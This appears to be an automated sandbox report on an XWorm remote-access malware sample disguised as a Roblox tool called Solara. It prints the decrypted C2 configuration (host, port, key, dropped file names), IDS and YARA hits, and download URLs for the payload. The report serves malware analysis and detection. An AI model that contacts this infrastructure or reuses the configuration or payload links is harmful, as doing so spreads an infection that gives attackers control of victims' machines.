                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpackString decryptor: hope-asia.gl.at.ply.gg
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpackString decryptor: 35710
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpackString decryptor: <123456789>
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpackString decryptor: <Xwormmm>
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpackString decryptor: FakeSolara?
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpackString decryptor: USB.exe
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpackString decryptor: %AppData%
                      Source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.unpackString decryptor: System User.exe
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49704 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.8:49707 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 128.116.123.3:443 -> 192.168.2.8:49708 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 104.20.22.46:443 -> 192.168.2.8:49709 version: TLS 1.2
                      Source: YgJ5inWPQO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1471950558.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1472115949.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1464730716.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbI source: dddd.exe, 0000000E.00000002.1744595376.000002624C77F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: dddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: YgJ5inWPQO.exe, 00000000.00000003.1464879729.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: dddd.exe, 0000000E.00000002.1744595376.000002624C710000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1464879729.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507566222.00007FFBBB61B000.00000002.00000001.01000000.00000007.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1463949860.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507721671.00007FFBBB63D000.00000002.00000001.01000000.00000006.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1463734787.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
                      Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: YgJ5inWPQO.exe, 00000000.00000003.1463734787.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1507847370.00007FFBBCD54000.00000002.00000001.01000000.00000005.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: YgJ5inWPQO.exe, 00000000.00000003.1465060554.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: YgJ5inWPQO.exe, 00000002.00000002.1499325131.00007FFBAACA9000.00000002.00000001.01000000.00000004.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.pdb source: dddd.exe, 0000000E.00000002.1744595376.000002624C7A1000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.pdb source: dddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5883B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF7FF5883B0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5892F0 FindFirstFileExW,FindClose,0_2_00007FF7FF5892F0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF5A18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF7FF5A18E4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5892F0 FindFirstFileExW,FindClose,2_2_00007FF7FF5892F0
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5A18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF7FF5A18E4
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 2_2_00007FF7FF5883B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_00007FF7FF5883B0

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49838 -> 147.185.221.18:35710
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: hope-asia.gl.at.ply.gg
                      Connects to many ports of the same IP (likely port scanning)
                      Source: global trafficTCP traffic: 147.185.221.18 ports 0,1,3,35710,5,7
                      Yara detected Generic Downloader
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.YgJ5inWPQO.exe.1d8a969d430.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.0.msedge.exe.3d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a969d430.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\System User.exe, type: DROPPED
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\msedge.exe, type: DROPPED
                      Source: global trafficTCP traffic: 192.168.2.8:49723 -> 147.185.221.18:35710
                      Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
                      Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: ip-api.com
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.8:49707 -> 104.21.93.27:443
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficHTTP traffic detected: GET /asset/discord.json HTTP/1.1Host: getsolara.devConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /api/endpoint.json HTTP/1.1Host: getsolara.dev
                      Source: global trafficHTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1Host: clientsettings.roblox.comConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1Host: www.nodejs.orgConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                      Source: global trafficDNS traffic detected: DNS query: getsolara.dev
                      Source: global trafficDNS traffic detected: DNS query: ip-api.com
                      Source: global trafficDNS traffic detected: DNS query: clientsettings.roblox.com
                      Source: global trafficDNS traffic detected: DNS query: www.nodejs.org
                      Source: global trafficDNS traffic detected: DNS query: nodejs.org
                      Source: global trafficDNS traffic detected: DNS query: hope-asia.gl.at.ply.gg
                      Source: dddd.exe, 0000000E.00000002.1731703513.000002623414E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463
                      Source: dddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.000002623414E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:6463/rpc?v=1
                      Source: dddd.exe, 0000000E.00000002.1731703513.000002623414E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:64632
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://clientsettings.roblox.com
                      Source: powershell.exe, 0000001E.00000002.1940467357.00000254D64E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                      Source: powershell.exe, 0000001E.00000002.1940467357.00000254D64E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                      Source: powershell.exe, 0000001E.00000002.1940467357.00000254D64E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m~
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                      Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-term4-fra2.roblox.com
                      Source: dddd.exe, 0000000E.00000002.1731703513.0000026234105000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://getsolara.dev
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                      Source: dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                      Source: dddd.exe, 0000000E.00000002.1731703513.0000026234332000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nodejs.org
                      Source: powershell.exe, 00000014.00000002.1605494790.0000021DC04C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1733400343.0000013848664000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1915994439.00000254CDE82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                      Source: powershell.exe, 00000022.00000002.1986459477.0000020B8022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 0000001E.00000002.1938005634.00000254D6363000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.mic
                      Source: powershell.exe, 00000014.00000002.1580676392.0000021DB0679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.000001383881A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BE039000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: msedge.exe, 0000000C.00000002.2742589628.000000000261B000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262340ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.1580676392.0000021DB0451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.00000138385F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BDE24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1986459477.0000020B80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000014.00000002.1580676392.0000021DB0679000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.000001383881A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BE039000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000022.00000002.1986459477.0000020B8022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1466452629.000001EB87FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                      Source: YgJ5inWPQO.exe, 00000000.00000003.1464219398.000001EB87FF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.2195632946.0000020BF8D56000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                      Source: powershell.exe, 0000001B.00000002.1757718254.0000013850C10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                      Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.nodejs.org
                      Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Bootstrapper.exe
                      Source: dddd.exe, 0000000E.00000002.1731703513.00000262341DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir
                      Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.Dir.zip
                      Source: dddd.exe, 0000000E.00000002.1731703513.0000026234122000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://485b1b07.solaraweb-alj.pages.dev/download/static/files/Solara.DirOf
                      Source: powershell.exe, 00000014.00000002.1580676392.0000021DB0451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1667545883.00000138385F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.1802770093.00000254BDE24000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000022.00000002.1986459477.0000020B80001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/vs/17/release/vc_redist.x64.exe
                      Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com
                      Source: dddd.exe, 0000000E.00000002.1731703513.00000262341EF000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234122000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262341CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clientsettings.roblox.com/v2/client-version/WindowsPlayer/channel/live
                      Source: powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000022.00000002.2145283227.0000020B90071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 0000001B.00000002.1758362165.0000013850D50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crosoft.com/pkiops/cer
                      Source: dddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://discord.com;http://127.0.0.1:6463/rpc?v=11
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1494882785.000001D8A94E0000.00000004.00001000.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1475162914.000001D8A94AF000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1476006333.000001D8A94BB000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1475162914.000001D8A9448000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1485952577.000001D8A9410000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1488071941.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1488956192.000001D8A9415000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491431607.000001D8A9417000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ExecutionLoader.get_filename
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_code
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A9124000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.get_source
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.InspectLoader.is_package
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A9124000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.create_module
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.Loader.exec_module
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.MetaPathFinder.invalidate_caches
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A90A0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.PathEntryFinder.find_spec
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1485952577.000001D8A9410000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1489435505.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494618160.000001D8A9411000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1488071941.000001D8A9411000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/library/importlib.html#importlib.abc.ResourceLoader.get_data
                      Source: dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262340FA000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.00000262340ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234172000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev/api/endpoint.json
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1497896040.000001D8A98E0000.00000004.00000020.00020000.00000000.sdmp, dddd.exe, 0000000E.00000000.1480645600.0000026232202000.00000002.00000001.01000000.00000009.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234051000.00000004.00000800.00020000.00000000.sdmp, dddd.exe, 0000000E.00000002.1731703513.0000026234063000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev/asset/discord.json
                      Source: powershell.exe, 00000022.00000002.1986459477.0000020B8022A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1494569830.000001D8A93F3000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1494594655.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1491822955.000001D8A93F6000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487788295.000001D8A93F4000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1493147338.000001D8A93F2000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
                      Source: YgJ5inWPQO.exe, 00000002.00000002.1494252029.000001D8A9124000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1487765708.000001D8A93EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
